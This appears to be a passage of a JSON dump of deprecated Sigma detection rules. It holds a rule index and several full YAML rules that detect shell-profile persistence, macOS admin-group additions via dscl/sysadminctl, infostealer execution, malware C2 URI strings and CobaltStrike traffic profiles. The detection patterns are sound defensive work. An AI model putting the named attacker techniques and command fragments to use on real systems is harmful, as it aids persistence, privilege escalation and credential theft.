\"70e68156-6571-427b-a6e9-4476a173a9b6\",\n        \"title\": \"Cmd Stream Redirection\",\n        \"date\": \"2022-02-04\",\n        \"modified\": \"2023-03-07\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"033fe7d6-66d1-4240-ac6b-28908009c71f\",\n        \"title\": \"APT29\",\n        \"date\": \"2018-12-04\",\n        \"modified\": \"2023-03-08\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"04d9079e-3905-4b70-ad37-6bdf11304965\",\n        \"title\": \"CrackMapExecWin\",\n        \"date\": \"2018-04-08\",\n        \"modified\": \"2023-03-08\",\n        \"level\": \"critical\"\n    },\n    {\n        \"id\": \"18739897-21b1-41da-8ee4-5b786915a676\",\n        \"title\": \"GALLIUM Artefacts\",\n        \"date\": \"2020-02-07\",\n        \"modified\": \"2023-03-09\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"0eb2107b-a596-422e-b123-b389d5594ed7\",\n        \"title\": \"Hurricane Panda Activity\",\n        \"date\": \"2019-03-04\",\n        \"modified\": \"2023-03-10\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"4a12fa47-c735-4032-a214-6fab5b120670\",\n        \"title\": \"Lazarus Activity Apr21\",\n        \"date\": \"2021-04-20\",\n        \"modified\": \"2023-03-10\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"7454df60-1478-484b-810d-bff5d0ba6d4b\",\n        \"title\": \"DNS Tunnel Technique from MuddyWater\",\n        \"date\": \"2020-06-04\",\n        \"modified\": \"2023-03-10\",\n        \"level\": \"critical\"\n    },\n    {\n        \"id\": \"7b49c990-4a9a-4e65-ba95-47c9cc448f6e\",\n        \"title\": \"Lazarus Loaders\",\n        \"date\": \"2020-12-23\",\n        \"modified\": \"2023-03-10\",\n        \"level\": \"critical\"\n    },\n    {\n        \"id\": \"43f487f0-755f-4c2a-bce7-d6d2eec2fcf8\",\n        \"title\": \"Suspicious Add Scheduled Task From User AppData Temp\",\n        \"date\": \"2021-11-03\",\n        \"modified\": \"2023-03-14\",\n        
\"level\": \"high\"\n    },\n    {\n        \"id\": \"d813d662-785b-42ca-8b4a-f7457d78d5a9\",\n        \"title\": \"Suspicious Load of Advapi31.dll\",\n        \"date\": \"2022-02-03\",\n        \"modified\": \"2023-03-15\",\n        \"level\": \"informational\"\n    },\n    {\n        \"id\": \"e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9\",\n        \"title\": \"Edit of .bash_profile and .bashrc\",\n        \"date\": \"2019-05-12\",\n        \"modified\": \"2023-03-23\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"ba2a7c80-027b-460f-92e2-57d113897dbc\",\n        \"title\": \"App Permissions Granted For Other APIs\",\n        \"date\": \"2022-07-28\",\n        \"modified\": \"2023-03-29\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"18cf6cf0-39b0-4c22-9593-e244bdc9a2d4\",\n        \"title\": \"TA505 Dropper Load Pattern\",\n        \"date\": \"2020-12-08\",\n        \"modified\": \"2023-04-05\",\n        \"level\": \"critical\"\n    },\n    {\n        \"id\": \"2d117e49-e626-4c7c-bd1f-c3c0147774c8\",\n        \"title\": \"Potential PowerShell Base64 Encoded Shellcode\",\n        \"date\": \"2018-11-17\",\n        \"modified\": \"2023-04-06\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"635dbb88-67b3-4b41-9ea5-a3af2dd88153\",\n        \"title\": \"Microsoft Binary Github Communication\",\n        \"date\": \"2017-08-24\",\n        \"modified\": \"2023-04-18\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"6c939dfa-c710-4e12-a4dd-47e1f10e68e1\",\n        \"title\": \"Domestic Kitten FurBall Malware Pattern\",\n        \"date\": \"2021-02-08\",\n        \"modified\": \"2023-04-20\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"6355a919-2e97-4285-a673-74645566340d\",\n        \"title\": \"Process Memory Dumped Via RdrLeakDiag.EXE\",\n        \"date\": \"2022-01-04\",\n        \"modified\": \"2023-04-24\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": 
\"9cf01b6c-e723-4841-a868-6d7f8245ca6e\",\n        \"title\": \"Group Modification Logging\",\n        \"date\": \"2019-03-26\",\n        \"modified\": \"2023-04-26\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"410ad193-a728-4107-bc79-4419789fcbf8\",\n        \"title\": \"Trickbot Malware Reconnaissance Activity\",\n        \"date\": \"2019-12-28\",\n        \"modified\": \"2023-04-28\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"fce5f582-cc00-41e1-941a-c6fabf0fdb8c\",\n        \"title\": \"Suspicious PowerShell Invocations - Specific\",\n        \"date\": \"2017-03-05\",\n        \"modified\": \"2023-05-04\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"f016c716-754a-467f-a39e-63c06f773987\",\n        \"title\": \"Suspicious Remote Thread Target\",\n        \"date\": \"2022-08-25\",\n        \"modified\": \"2023-05-05\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"65d2be45-8600-4042-b4c0-577a1ff8a60e\",\n        \"title\": \"Application Whitelisting Bypass via DLL Loaded by odbcconf.exe\",\n        \"date\": \"2019-10-25\",\n        \"modified\": \"2023-05-22\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"8e2b24c9-4add-46a0-b4bb-0057b4e6187d\",\n        \"title\": \"Regsvr32 Anomaly\",\n        \"date\": \"2019-01-16\",\n        \"modified\": \"2023-05-26\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"fe6e002f-f244-4278-9263-20e4b593827f\",\n        \"title\": \"Alternate PowerShell Hosts - Image\",\n        \"date\": \"2019-09-12\",\n        \"modified\": \"2023-06-01\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"9e77ed63-2ecf-4c7b-b09d-640834882028\",\n        \"title\": \"PsExec Pipes Artifacts\",\n        \"date\": \"2020-05-10\",\n        \"modified\": \"2023-08-07\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"39776c99-1c7b-4ba0-b5aa-641525eee1a4\",\n        \"title\": \"Execution via 
CL_Mutexverifiers.ps1\",\n        \"date\": \"2020-10-14\",\n        \"modified\": \"2023-08-17\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"4cd29327-685a-460e-9dac-c3ab96e549dc\",\n        \"title\": \"Execution via CL_Invocation.ps1 - Powershell\",\n        \"date\": \"2020-10-14\",\n        \"modified\": \"2023-08-17\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"4e8d5fd3-c959-441f-a941-f73d0cdcdca5\",\n        \"title\": \"Abusing Windows Telemetry For Persistence - Registry\",\n        \"date\": \"2020-09-29\",\n        \"modified\": \"2023-08-17\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"7c637634-c95d-4bbf-b26c-a82510874b34\",\n        \"title\": \"Disable Microsoft Office Security Features\",\n        \"date\": \"2021-06-08\",\n        \"modified\": \"2023-08-17\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"8a58209c-7ae6-4027-afb0-307a78e4589a\",\n        \"title\": \"User Account Hidden By Registry\",\n        \"date\": \"2022-08-20\",\n        \"modified\": \"2023-08-17\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"9b894e57-033f-46cf-b7fa-a52804181973\",\n        \"title\": \"Office Security Settings Changed\",\n        \"date\": \"2020-05-22\",\n        \"modified\": \"2023-08-17\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"c81fe886-cac0-4913-a511-2822d72ff505\",\n        \"title\": \"SilentProcessExit Monitor Registration\",\n        \"date\": \"2021-02-26\",\n        \"modified\": \"2023-08-17\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"0c1ffcf9-efa9-436e-ab68-23a9496ebf5b\",\n        \"title\": \"User Added To Admin Group - MacOS\",\n        \"date\": \"2023-03-19\",\n        \"modified\": \"2023-08-22\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"5b80cf53-3a46-4adc-960b-05ec19348d74\",\n        \"title\": \"Wscript Execution from Non C Drive\",\n        \"date\": \"2022-10-01\",\n       
 \"modified\": \"2023-08-29\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"5e3d3601-0662-4af0-b1d2-36a05e90c40a\",\n        \"title\": \"LSASS Memory Dump File Creation\",\n        \"date\": \"2019-10-22\",\n        \"modified\": \"2023-08-29\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"839f1ee1-292d-495a-bf37-818267b8ee82\",\n        \"title\": \"Vulnerable Driver Load By Name\",\n        \"date\": \"2022-10-03\",\n        \"modified\": \"2023-09-03\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"21b23707-60d6-41bb-96e3-0f0481b0fed9\",\n        \"title\": \"Vulnerable Dell BIOS Update Driver Load\",\n        \"date\": \"2021-05-05\",\n        \"modified\": \"2023-09-12\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647\",\n        \"title\": \"Vulnerable GIGABYTE Driver Load\",\n        \"date\": \"2022-07-25\",\n        \"modified\": \"2023-09-12\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"7c676970-af4f-43c8-80af-ec9b49952852\",\n        \"title\": \"Vulnerable AVAST Anti Rootkit Driver Load\",\n        \"date\": \"2022-07-28\",\n        \"modified\": \"2023-09-12\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"9bacc538-d1b9-4d42-862e-469eafc05a41\",\n        \"title\": \"Vulnerable HW Driver Load\",\n        \"date\": \"2022-07-26\",\n        \"modified\": \"2023-09-12\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"ac683a42-877b-4ff8-91ac-69e94b0f70b4\",\n        \"title\": \"Vulnerable Lenovo Driver Load\",\n        \"date\": \"2022-11-10\",\n        \"modified\": \"2023-09-12\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6\",\n        \"title\": \"Usage Of Malicious POORTRY Signed Driver\",\n        \"date\": \"2022-12-16\",\n        \"modified\": \"2023-09-13\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": 
\"d7825193-b70a-48a4-b992-8b5b3015cc11\",\n        \"title\": \"Windows Update Client LOLBIN\",\n        \"date\": \"2020-10-17\",\n        \"modified\": \"2023-11-11\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"ca83e9f3-657a-45d0-88d6-c1ac280caf53\",\n        \"title\": \"New Service Uses Double Ampersand in Path\",\n        \"date\": \"2022-07-05\",\n        \"modified\": \"2023-11-15\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"fe34868f-6e0e-4882-81f6-c43aa8f15b62\",\n        \"title\": \"Windows Defender Threat Detection Disabled\",\n        \"date\": \"2020-07-28\",\n        \"modified\": \"2023-11-22\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"32d0d3e2-e58d-4d41-926b-18b520b2b32d\",\n        \"title\": \"Credential Dumping Tools Accessing LSASS Memory\",\n        \"date\": \"2017-02-16\",\n        \"modified\": \"2023-11-30\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"a122ac13-daf8-4175-83a2-72c387be339d\",\n        \"title\": \"Security Event Log Cleared\",\n        \"date\": \"2021-08-15\",\n        \"modified\": \"2023-12-06\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"0332a266-b584-47b4-933d-a00b103e1b37\",\n        \"title\": \"Suspicious Get-WmiObject\",\n        \"date\": \"2022-01-12\",\n        \"modified\": \"2023-12-11\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"46deb5e1-28c9-4905-b2df-51cdcc9e6073\",\n        \"title\": \"PowerShell Scripts Run by a Services\",\n        \"date\": \"2020-10-06\",\n        \"modified\": \"2023-12-11\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"d23f2ba5-9da0-4463-8908-8ee47f614bb9\",\n        \"title\": \"Powershell File and Directory Discovery\",\n        \"date\": \"2021-12-15\",\n        \"modified\": \"2023-12-11\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2\",\n        \"title\": \"Credential Dumping Tools 
Service Execution\",\n        \"date\": \"2017-03-05\",\n        \"modified\": \"2023-12-11\",\n        \"level\": \"critical\"\n    },\n    {\n        \"id\": \"602a1f13-c640-4d73-b053-be9a2fa58b77\",\n        \"title\": \"Svchost DLL Search Order Hijack\",\n        \"date\": \"2019-10-28\",\n        \"modified\": \"2024-01-10\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"839dd1e8-eda8-4834-8145-01beeee33acd\",\n        \"title\": \"SAM Dump to AppData\",\n        \"date\": \"2018-01-27\",\n        \"modified\": \"2024-01-18\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"e32ce4f5-46c6-4c47-ba69-5de3c9193cd7\",\n        \"title\": \"Possible Process Hollowing Image Loading\",\n        \"date\": \"2018-01-07\",\n        \"modified\": \"2024-01-22\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"a6d67db4-6220-436d-8afc-f3842fe05d43\",\n        \"title\": \"Dnscat Execution\",\n        \"date\": \"2019-10-24\",\n        \"modified\": \"2024-01-25\",\n        \"level\": \"critical\"\n    },\n    {\n        \"id\": \"d7b09985-95a3-44be-8450-b6eadf49833e\",\n        \"title\": \"Suspicious Non-Browser Network Communication With Reddit API\",\n        \"date\": \"2023-02-16\",\n        \"modified\": \"2024-02-02\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"37325383-740a-403d-b1a2-b2b4ab7992e7\",\n        \"title\": \"CobaltStrike Malleable (OCSP) Profile\",\n        \"date\": \"2019-11-12\",\n        \"modified\": \"2024-02-15\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"41b42a36-f62c-4c34-bd40-8cb804a34ad8\",\n        \"title\": \"CobaltStrike Malformed UAs in Malleable Profiles\",\n        \"date\": \"2021-05-06\",\n        \"modified\": \"2024-02-15\",\n        \"level\": \"critical\"\n    },\n    {\n        \"id\": \"953b895e-5cc9-454b-b183-7f3db555452e\",\n        \"title\": \"CobaltStrike Malleable Amazon Browsing Traffic Profile\",\n        \"date\": 
\"2019-11-12\",\n        \"modified\": \"2024-02-15\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"c9b33401-cc6a-4cf6-83bb-57ddcb2407fc\",\n        \"title\": \"CobaltStrike Malleable OneDrive Browsing Traffic Profile\",\n        \"date\": \"2019-11-12\",\n        \"modified\": \"2024-02-15\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"73fcad2e-ff14-4c38-b11d-4172c8ac86c7\",\n        \"title\": \"Suspicious Rundll32 Script in CommandLine\",\n        \"date\": \"2021-12-04\",\n        \"modified\": \"2024-02-23\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"9f06447a-a33a-4cbe-a94f-a3f43184a7a3\",\n        \"title\": \"Rundll32 JS RunHTMLApplication Pattern\",\n        \"date\": \"2022-01-14\",\n        \"modified\": \"2024-02-23\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"e06ac91d-b9e6-443d-8e5b-af749e7aa6b6\",\n        \"title\": \"iOS Implant URL Pattern\",\n        \"date\": \"2019-08-30\",\n        \"modified\": \"2024-02-26\",\n        \"level\": \"critical\"\n    },\n    {\n        \"id\": \"628d7a0b-7b84-4466-8552-e6138bc03b43\",\n        \"title\": \"Suspicious Epmap Connection\",\n        \"date\": \"2022-07-14\",\n        \"modified\": \"2024-03-01\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"9433ff9c-5d3f-4269-99f8-95fc826ea489\",\n        \"title\": \"CrackMapExec File Creation Patterns\",\n        \"date\": \"2022-03-12\",\n        \"modified\": \"2024-03-01\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"c625c4c2-515d-407f-8bb6-456f65955669\",\n        \"title\": \"Service Binary in Uncommon Folder\",\n        \"date\": \"2022-05-02\",\n        \"modified\": \"2024-03-25\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"42f0e038-767e-4b85-9d96-2c6335bad0b5\",\n        \"title\": \"Adwind RAT / JRAT - Registry\",\n        \"date\": \"2017-11-10\",\n        \"modified\": \"2024-03-26\",\n        \"level\": \"high\"\n  
  },\n    {\n        \"id\": \"5039f3d2-406a-4c1a-9350-7a5a85dc84c2\",\n        \"title\": \"Search-ms and WebDAV Suspicious Indicators in URL\",\n        \"date\": \"2023-08-21\",\n        \"modified\": \"2024-05-10\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"b916cba1-b38a-42da-9223-17114d846fd6\",\n        \"title\": \"Potential NT API Stub Patching\",\n        \"date\": \"2023-01-07\",\n        \"modified\": \"2024-05-27\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"3d968d17-ffa4-4bc0-bfdc-f139de76ce77\",\n        \"title\": \"Potential Persistence Via COM Hijacking From Suspicious Locations\",\n        \"date\": \"2022-07-28\",\n        \"modified\": \"2024-07-16\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"1a3d42dd-3763-46b9-8025-b5f17f340dfb\",\n        \"title\": \"Suspicious Unattend.xml File Access\",\n        \"date\": \"2021-12-19\",\n        \"modified\": \"2024-07-22\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"6902955a-01b7-432c-b32a-6f5f81d8f624\",\n        \"title\": \"Suspicious File Event With Teams Objects\",\n        \"date\": \"2022-09-16\",\n        \"modified\": \"2024-07-22\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12\",\n        \"title\": \"Potential Persistence Via COM Search Order Hijacking\",\n        \"date\": \"2020-04-14\",\n        \"modified\": \"2024-09-02\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"a33f8808-2812-4373-ae95-8cfb82134978\",\n        \"title\": \"Windows Defender Exclusion Deleted\",\n        \"date\": \"2019-10-26\",\n        \"modified\": \"2025-01-30\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"e17121b4-ef2a-4418-8a59-12fb1631fa9e\",\n        \"title\": \"Delete Volume Shadow Copies via WMI with PowerShell - PS Script\",\n        \"date\": \"2021-12-26\",\n        \"modified\": \"2025-05-20\",\n        \"level\": \"high\"\n  
  },\n    {\n        \"id\": \"6e897651-f157-4d8f-aaeb-df8151488385\",\n        \"title\": \"PowerShell Web Download\",\n        \"date\": \"2022-03-24\",\n        \"modified\": \"2025-07-18\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"f748c45a-f8d3-4e6f-b617-fe176f695b8f\",\n        \"title\": \".RDP File Created by Outlook Process\",\n        \"date\": \"2024-11-01\",\n        \"modified\": \"2025-07-22\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"a2a3b925-7bb0-433b-b508-db9003263cc4\",\n        \"title\": \"Active Directory Parsing DLL Loaded Via Office Application\",\n        \"date\": \"2020-02-19\",\n        \"modified\": \"2025-10-17\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"cdeef967-f9a1-4375-90ee-6978c5f23974\",\n        \"title\": \"Azure Application Credential Modified\",\n        \"date\": \"2021-09-02\",\n        \"modified\": \"2025-10-17\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"8f70ac5f-1f6f-4f8e-b454-db19561216c5\",\n        \"title\": \"PowerShell DownloadFile\",\n        \"date\": \"2020-08-28\",\n        \"modified\": \"2025-10-20\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"e28a5a99-da44-436d-b7a0-2afc20a5f413\",\n        \"title\": \"Whoami Utility Execution\",\n        \"date\": \"2018-08-13\",\n        \"modified\": \"2025-10-20\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"7417e29e-c2e7-4cf6-a2e8-767228c64837\",\n        \"title\": \"Active Directory Kerberos DLL Loaded Via Office Application\",\n        \"date\": \"2020-02-19\",\n        \"modified\": \"2025-10-22\",\n        \"level\": \"medium\"\n    },\n    {\n        \"id\": \"879c3015-c88b-4782-93d7-07adf92dbcb7\",\n        \"title\": \"Space After Filename\",\n        \"date\": \"2020-06-17\",\n        \"modified\": \"2025-11-22\",\n        \"level\": \"low\"\n    },\n    {\n        \"id\": \"e710a880-1f18-4417-b6a0-b5afdf7e305a\",\n        
\"title\": \"Atomic MacOS Stealer - FileGrabber Infostealer Execution\",\n        \"date\": \"2025-09-12\",\n        \"modified\": \"2025-11-22\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"4be03877-d5b6-4520-85c9-a5911c0a656c\",\n        \"title\": \"FileFix - Suspicious Child Process from Browser File Upload Abuse\",\n        \"date\": \"2025-06-26\",\n        \"modified\": \"2025-11-24\",\n        \"level\": \"high\"\n    },\n    {\n        \"id\": \"6e30c82f-a9f8-4aab-b79c-7c12bce6f248\",\n        \"title\": \"File Download Via Bitsadmin To An Uncommon Target Folder\",\n        \"date\": \"2022-06-28\",\n        \"modified\": \"2025-12-10\",\n        \"level\": \"medium\"\n    }\n]"
  },
  {
    "path": "deprecated/linux/lnx_auditd_alter_bash_profile.yml",
    "content": "title: Edit of .bash_profile and .bashrc\nid: e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9\nstatus: deprecated\ndescription: Detects change of user environment. Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell.\nreferences:\n    - 'MITRE Attack technique T1156; .bash_profile and .bashrc. '\nauthor: Peter Matkovski\ndate: 2019/05/12\nmodified: 2023/03/23\ntags:\n    - attack.s0003\n    - attack.persistence\n    - attack.t1546.004\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'PATH'\n        name:\n            - '/root/.bashrc'\n            - '/root/.bash_profile'\n            - '/root/.profile'\n            - '/home/*/.bashrc'\n            - '/home/*/.bash_profile'\n            - '/home/*/.profile'\n            - '/etc/profile'\n            - '/etc/shells'\n            - '/etc/bashrc'\n            - '/etc/csh.cshrc'\n            - '/etc/csh.login'\n    condition: selection\nfalsepositives:\n    - Admin or User activity\nlevel: medium\n"
  },
  {
    "path": "deprecated/linux/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml",
    "content": "title: OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd\nid: 045b5f9c-49f7-4419-a236-9854fb3c827a\nstatus: unsupported # This rule requires correlations. See https://github.com/SigmaHQ/sigma/discussions/4440#discussioncomment-7070862 and https://user-images.githubusercontent.com/9653181/133756156-4fb9c2b1-aa65-4380-957b-72170de36fc4.png\ndescription: |\n    Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\n    SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager.\n    Microsoft Azure, and Microsoft Operations Management Suite.\nreferences:\n    - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure\n    - https://github.com/Azure/Azure-Sentinel/pull/3059\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2021-09-17\nmodified: 2024-09-02\ntags:\n    - attack.privilege-escalation\n    - attack.initial-access\n    - attack.execution\n    - attack.t1068\n    - attack.t1190\n    - attack.t1203\nlogsource:\n    product: linux\n    service: auditd\ndetection:\n    selection:\n        type: 'SYSCALL'\n        syscall: 'execve'\n        uid: 0\n        cwd: '/var/opt/microsoft/scx/tmp'\n        comm: 'sh'\n    condition: selection\nfalsepositives:\n    - Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand.\nlevel: high\n"
  },
  {
    "path": "deprecated/linux/lnx_space_after_filename_.yml",
    "content": "title: Space After Filename\nid: 879c3015-c88b-4782-93d7-07adf92dbcb7\nstatus: deprecated\ndescription: Detects space after filename\nauthor: Ömer Günal\ndate: 2020-06-17\nmodified: 2025-11-22\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    product: linux\ndetection:\n    selection1:\n        - 'echo \"*\" > * && chmod +x *'\n    selection2:\n        - 'mv * \"* \"'\n    condition: all of selection*\nfalsepositives:\n    - Typos\nlevel: low\n"
  },
  {
    "path": "deprecated/macos/proc_creation_macos_add_to_admin_group.yml",
    "content": "title: User Added To Admin Group - MacOS\nid: 0c1ffcf9-efa9-436e-ab68-23a9496ebf5b\nstatus: deprecated\ndescription: Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos\n    - https://ss64.com/osx/dscl.html\n    - https://ss64.com/osx/sysadminctl.html\nauthor: Sohan G (D4rkCiph3r)\ndate: 2023/03/19\nmodified: 2023/08/22\ntags:\n    - attack.t1078.003\n    - attack.initial_access\n    - attack.privilege_escalation\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection_sysadminctl: #creates and adds new user to admin group\n        Image|endswith: '/sysadminctl'\n        CommandLine|contains|all:\n            - ' -addUser '\n            - ' -admin '\n    selection_dscl: #adds to admin group\n        Image|endswith: '/dscl'\n        CommandLine|contains|all:\n            - ' -append '\n            - ' /Groups/admin '\n            - ' GroupMembership '\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "deprecated/macos/proc_creation_macos_malware_amos_filegrabber_exec.yml",
    "content": "title: Atomic MacOS Stealer - FileGrabber Infostealer Execution\nid: e710a880-1f18-4417-b6a0-b5afdf7e305a\nstatus: deprecated\ndescription: |\n    Detects the execution of FileGrabber on macOS, which is associated with Amos infostealer campaigns targeting sensitive user files.\nreferences:\n    - https://www.trendmicro.com/en_us/research/25/i/an-mdr-analysis-of-the-amos-stealer-campaign.html\n    - https://www.jamf.com/blog/infostealers-pose-threat-to-macos/\nauthor: Jason Phang Vern - Onn (Gen Digital)\ndate: 2025-09-12\nmodified: 2025-11-22\ntags:\n    - attack.execution\n    - attack.t1059.002\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'FileGrabber'\n            - '/tmp'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/other/generic_brute_force.yml",
    "content": "title: Brute Force\nid: 53c7cca0-2901-493a-95db-d00d6fcf0a37\nstatus: deprecated\ndescription: Detects many authentication failures from one source to one destination which is may indicate Brute Force activity\nauthor: Aleksandr Akhremchik, oscd.community\ndate: 2019/10/25\nmodified: 2022/11/04\nlogsource:\n  category: authentication\ndetection:\n  selection:\n    action: failure\n  timeframe: 600s\n  condition: selection | count(category) by dst_ip > 30\nfields:\n  - src_ip\n  - dst_ip\n  - user\nfalsepositives:\n  - Inventarization\n  - Vulnerability scanner\n  - Legitimate application\nlevel: medium\ntags:\n  - attack.credential_access\n  - attack.t1110\n"
  },
  {
    "path": "deprecated/web/proxy_apt_domestic_kitten.yml",
    "content": "title: Domestic Kitten FurBall Malware Pattern\nid: 6c939dfa-c710-4e12-a4dd-47e1f10e68e1\nstatus: deprecated\ndescription: Detects specific malware patterns used by FurBall malware linked to Iranian Domestic Kitten APT group\nreferences:\n    - https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021/02/08\nmodified: 2023/04/20\ntags:\n    - attack.command_and_control\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        c-uri|contains:\n            - 'Get~~~AllBrowser'\n            - 'Get~~~HardwareInfo'\n            - 'Take~~RecordCall'\n            - 'Reset~~~AllCommand'\n    condition: selection\nfields:\n    - c-ip\n    - c-uri\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "deprecated/web/proxy_cobalt_amazon.yml",
    "content": "title: CobaltStrike Malleable Amazon Browsing Traffic Profile\nid: 953b895e-5cc9-454b-b183-7f3db555452e\nstatus: deprecated\ndescription: Detects Malleable Amazon Profile\nreferences:\n    - https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile\n    - https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100\nauthor: Markus Neis\ndate: 2019/11/12\nmodified: 2024/02/15\ntags:\n    - attack.defense_evasion\n    - attack.command_and_control\n    - attack.t1071.001\nlogsource:\n    category: proxy\ndetection:\n    selection_1:\n        c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'\n        cs-method: 'GET'\n        c-uri: '/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books'\n        cs-host: 'www.amazon.com'\n        cs-cookie|endswith: '=csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996'\n    selection_2:\n        c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'\n        cs-method: 'POST'\n        c-uri: '/N4215/adj/amzn.us.sr.aps'\n        cs-host: 'www.amazon.com'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "deprecated/web/proxy_cobalt_malformed_uas.yml",
